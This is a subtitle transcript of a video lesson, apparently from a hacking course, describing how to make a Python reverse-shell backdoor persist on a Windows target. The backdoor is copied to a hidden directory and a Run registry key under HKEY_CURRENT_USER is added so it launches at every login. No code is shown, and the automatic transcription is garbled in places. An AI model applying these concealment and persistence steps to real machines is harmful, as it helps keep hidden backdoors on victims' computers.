1
00:00:00,270 --> 00:00:00,950
Hello everybody.

2
00:00:00,990 --> 00:00:02,280
And welcome back.

3
00:00:02,280 --> 00:00:08,880
And right now let's see how we can perform the persistence function or persistence auction for our rivers

4
00:00:08,880 --> 00:00:09,690
show.

5
00:00:09,690 --> 00:00:13,290
So first of all let me just exit the show from our previous video.

6
00:00:14,250 --> 00:00:16,540
We have our show right here.

7
00:00:16,560 --> 00:00:22,800
We can delete this show since we will use another one after we compile it.

8
00:00:22,820 --> 00:00:25,410
Let me just delete this.

9
00:00:25,550 --> 00:00:25,850
OK.

10
00:00:25,850 --> 00:00:26,750
Doesn't want to delete.

11
00:00:26,750 --> 00:00:26,950
Yes.

12
00:00:26,980 --> 00:00:29,620
So we were deleted in just a few seconds.

13
00:00:29,720 --> 00:00:35,930
And right now what we want to do is we want to know our reverse dot shall our pardon me reverse underscore

14
00:00:35,930 --> 00:00:37,590
shall dot pi.

15
00:00:37,700 --> 00:00:40,030
Here we have everything we need from now on.

16
00:00:40,070 --> 00:00:46,850
And what we want to do right now is called the part where we will actually perform the persistent on

17
00:00:46,850 --> 00:00:48,340
target system.

18
00:00:48,350 --> 00:00:54,440
Now before we do that I want to introduce you to a certain part of Windows called the registry.

19
00:00:54,440 --> 00:01:03,740
Now you can enter the registry in Windows by going to the search bar typing in run opening the run application

20
00:01:04,010 --> 00:01:06,710
and typing in the run application rack at it.

21
00:01:06,860 --> 00:01:12,150
Once you click on the edit you can click OK it will prompt you for administrator password.

22
00:01:12,380 --> 00:01:14,740
Since you're entering the Registry Editor.

23
00:01:14,930 --> 00:01:15,870
If you specify.

24
00:01:15,890 --> 00:01:22,520
Yes it will open up your registry as we can see the registry is basically the heart of windows.

25
00:01:22,640 --> 00:01:29,820
Here we can actually create a registry key which will actually run our target or pardon me our backdoor

26
00:01:29,840 --> 00:01:34,240
on target every time the target builds up.

27
00:01:34,250 --> 00:01:39,830
So what we want to do is go to the first of all that and just put this.

28
00:01:39,830 --> 00:01:44,570
This is something that you will probably see once you open the registry for the first time.

29
00:01:44,780 --> 00:01:50,330
So we can see these five registry directories we are currently interested in these two right here.

30
00:01:50,330 --> 00:01:52,720
One of them is the HP current user.

31
00:01:52,730 --> 00:01:55,310
And the other one is HP local machine.

32
00:01:55,610 --> 00:02:04,010
Now where they both will be performing the same function for us if we go to the HP current user and

33
00:02:04,010 --> 00:02:10,700
code and make a registry key for our backdoor in that part it will only run after the restart if the

34
00:02:10,940 --> 00:02:13,760
user logs into the same account.

35
00:02:13,760 --> 00:02:21,200
Now if we copy it in the HP local machine it will run our backdoor no matter on which account the user

36
00:02:21,260 --> 00:02:30,070
logs in for now on our target you will run this on user account and we do not have the administrative

37
00:02:30,070 --> 00:02:36,370
privileges even if we add the function to call PD or to make the registry key for our backdoor in the

38
00:02:36,370 --> 00:02:37,480
HQ local machine.

39
00:02:37,480 --> 00:02:41,840
We will not be able to do it since it requires administrative privileges.

40
00:02:41,950 --> 00:02:47,330
We can only make the persistence at the moment for our HQ current user.

41
00:02:47,350 --> 00:02:53,230
That means we can only make the persistence after the user logs in to the same account.

42
00:02:53,230 --> 00:02:55,660
So we will do that for now.

43
00:02:55,660 --> 00:02:59,830
If we go to the HQ current user please press on the arrow right here.

44
00:02:59,980 --> 00:03:03,800
Go to the software as we can see you find the software right here.

45
00:03:03,820 --> 00:03:05,430
Press on the arrow down there.

46
00:03:05,500 --> 00:03:12,160
Find the Microsoft Press there the arrow as well scroll down and what you want to find is the windows

47
00:03:12,220 --> 00:03:16,400
and individuals you want to find the current version so let me just show you how that looks like.

48
00:03:16,420 --> 00:03:24,340
So you found the Microsoft you pressed on the arrow scroll down on windows right here found current

49
00:03:24,340 --> 00:03:33,430
version and you want to find the run folder here or the registry keys are here for the files or programs

50
00:03:33,460 --> 00:03:40,220
that will run at the startup of the user log in so we can see we already have some such as cleaner and

51
00:03:40,240 --> 00:03:46,140
one drives team and other default applications that most of us have on our P.C..

52
00:03:46,660 --> 00:03:53,110
Now this is also some part of the P.C. where most of the viruses and back doors will be if you have

53
00:03:53,110 --> 00:04:01,940
one and this is also where we will actually install the registry key for our own backdoor but we want

54
00:04:01,940 --> 00:04:10,850
to perform a smart thing which is actually keeping our backdoor first to some other directory where

55
00:04:10,850 --> 00:04:17,580
the user won't find it and then putting the registry key to run the backdoor from that other directory.

56
00:04:17,600 --> 00:04:25,640
So for example if the target closes the our backdoor in the task manager they can then delete the file

57
00:04:25,640 --> 00:04:26,350
simply.

58
00:04:26,480 --> 00:04:29,410
Now I'm not really sure why right now.

59
00:04:29,510 --> 00:04:31,200
Probably because I didn't close it.

60
00:04:31,230 --> 00:04:31,480
Good.

61
00:04:31,510 --> 00:04:36,020
So let me just open my task manager so I can delete this reverse shell.

62
00:04:36,050 --> 00:04:41,690
Seems like the process is already running for some reason which I'm not really sure why but it doesn't

63
00:04:41,690 --> 00:04:47,930
really matter we'll just find it right here cause the ending the task of it and then we can now delete

64
00:04:47,930 --> 00:04:48,200
it.

65
00:04:49,010 --> 00:04:51,830
And this is how the user will also be able to delete it.

66
00:04:52,340 --> 00:04:57,920
So we want to make sure to copy the reverse shell right after they run it into some different directory

67
00:04:58,250 --> 00:05:01,730
and then we want to create the registry key for that different directory.

68
00:05:01,730 --> 00:05:04,460
As you can see the registry key is something like this.

69
00:05:04,460 --> 00:05:07,650
You performed name and it will perform on the set.

70
00:05:07,670 --> 00:05:10,160
The path to the program that you want to run.

71
00:05:10,190 --> 00:05:17,150
So for this program for example the path easy program path Gaza and then JPY stationed at the CDC the

72
00:05:17,150 --> 00:05:19,290
program that will run at startup.

73
00:05:19,430 --> 00:05:28,460
Every time I log into my windows state account so let's see how we can perform that.

74
00:05:28,790 --> 00:05:38,180
First of all we we want to implement two different libraries for python one of them is the OS library

75
00:05:38,660 --> 00:05:44,980
which we will use for multiple things later on and one of them is the CS library.

76
00:05:45,140 --> 00:05:50,460
Now I will show you how you can perform all of that in the next video.

77
00:05:50,460 --> 00:05:55,560
From now on I just wanted to explain what we will be doing so that in the next video when we actually

78
00:05:55,560 --> 00:06:00,230
code all of this you don't get confused by what am I doing.

79
00:06:00,230 --> 00:06:05,100
So I will also explain the next video every app I do what exactly that means.

80
00:06:05,100 --> 00:06:09,050
So I hope I see you in the next video and take care by.